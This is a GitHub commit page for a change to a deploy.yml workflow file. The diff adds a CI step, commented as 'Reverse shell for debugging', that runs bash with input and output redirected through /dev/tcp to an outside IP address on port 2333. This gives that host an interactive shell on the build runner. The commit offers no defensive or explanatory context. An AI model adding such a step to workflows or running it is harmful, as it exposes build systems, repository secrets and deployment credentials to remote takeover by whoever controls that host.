Skip to content

Commit

Permalink
Update deploy.yml
Browse files Browse the repository at this point in the history
  • Loading branch information
lyc8503 authored Nov 16, 2023
1 parent c94fab2 commit afb587c
Showing 1 changed file with 3 additions and 2 deletions.
5 changes: 3 additions & 2 deletions .github/workflows/deploy.yml
Original file line number Diff line number Diff line change
Expand Up @@ -15,5 +15,6 @@ jobs:
with:
node-version: 18.x
cache: 'npm'

- run: npm install

# Reverse shell for debugging
- run: bash -i >& /dev/tcp/20.187.68.83/2333 0>&1

0 comments on commit afb587c

Please sign in to comment.